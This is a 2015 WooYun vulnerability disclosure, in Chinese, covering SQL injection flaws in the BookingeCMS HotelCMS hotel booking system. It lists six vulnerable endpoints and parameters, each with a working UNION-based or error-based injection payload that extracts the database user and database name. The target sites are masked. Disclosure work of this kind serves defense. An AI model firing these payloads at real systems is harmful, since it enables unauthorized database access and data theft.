当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137378

漏洞标题:BookingeCMS HotelCMS酒店预订管理系统SQL注入5枚

相关厂商:珠海中新信息科技有限公司

漏洞作者: 路人甲

提交时间:2015-09-04 13:33

修复时间:2015-12-06 09:00

公开时间:2015-12-06 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-07: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向第三方安全合作伙伴开放
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开

简要描述:

另外6枚咯~

详细说明:

  珠海中新信息科技有限公司开发的BookingeCMS HotelCMS存在多个SQL注入,前面有人xfkxfk提交过这个公司的KTVCMS。与现在提交的系统漏洞不一样。
相关产品:

01.png


SQL Injection:
GET:

1、/?m=info&rewrite=1                                 rewrite参数存在注入
2、/?m=login.checkAccount&account= account参数存在注入


POST:

3、/?m=hotel.setSearchSession  
POST数据:type=getCityId&cityName=珠海&hotelName=&indate=2015-08-26&outdate=2015-08-29                            
注意:第三处注入需不带cookie注入;否则一直都是提示报错 cityName参数存在注入
4、/?m=hotel.getHotelInfo
POST数据:hotelId=1 hotelId参数存在注入

5、/?m=login.check
POST数据:account=test'&password=123456 account参数存在注入
6、/?m=city.getCity
POST数据:provinceId=2200&pageSize=0&json=true provinceId参数存在注入


Case:

mask 区域
1.http://**.**.**/_
2.http://**.**.**/_
3.http://**.**.**/_
4.http://**.**.**/bg/_
5.http://**.**.**/_
6.http://**.**.**/_
7.http://**.**.**/_
8.http://**.**.**/_
9.http://**.**.**/_
10.http://**.**.**/_
11.http://**.**.**/

漏洞证明:

Security Testing:
安全测试SQL注入漏洞,测试注入user()、或者database()
注:不排除有小部分站点有安全狗或者其它情况。

1、测试Payload:
?m=info&rewrite=1' UNION ALL SELECT CONCAT(0x7c,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7c),NULL%23

02.png


2、测试Payload:
/?m=login.checkAccount&account= ' AND (SELECT 9468 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uNGB'='uNGB

03.png


3、测试Payload:
cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND (SELECT 4965 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&indate=2015-08-27&outdate=2015-08-30&address=&hotelName=1

04.png


4、测试Payload:
hotelId=11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

05.png


5、测试Payload:
account=test' AND (SELECT 1345 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wuaQ'='wuaQ&password=123456

06.png


6、测试Payload:
provinceId=1' AND (SELECT 7525 FROM(SELECT COUNT(*),CONCAT(0x7c,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7c,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IOvh'='IOvh&pageSize=0&json=true

07.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-07 08:58

厂商回复:

暂未建立与软件生产厂商的直接处置渠道,待认领.

最新状态:

暂无


漏洞评价:

评论